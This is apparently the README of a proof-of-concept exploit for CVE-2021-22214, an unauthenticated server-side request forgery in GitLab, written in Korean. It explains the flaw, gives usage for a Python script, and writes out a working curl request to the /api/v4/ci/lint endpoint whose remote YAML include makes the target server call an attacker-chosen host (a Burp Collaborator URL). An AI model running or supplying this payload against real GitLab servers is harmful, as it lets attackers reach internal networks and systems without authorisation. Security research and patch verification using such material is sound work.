
# CVE-2021-22214 개념 증명 익스플로잇 GitLab 웹훅의 서버 측 요청 위조(SSRF) 취약점으로, 인증되지 않은 공격자가 내부 HTTP 요청을 보낼 수 있게 해줍니다.
CVE-2021-22214용 POC: Gitlab SSRF
원격 GitLab 설치에는 내부 네트워크의 웹훅이 활성화되어 있어 서버 측 요청 위조(SSRF) 취약점이 존재합니다. 원격의 인증되지 않은 공격자는 등록이 제한된 GitLab 인스턴스를 악용하여 공격자가 선택한 임의의 도메인으로 HTTP 요청을 보내도록 만들 수 있습니다.
사용법: python3 GitLab_SSRF.py <대상> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'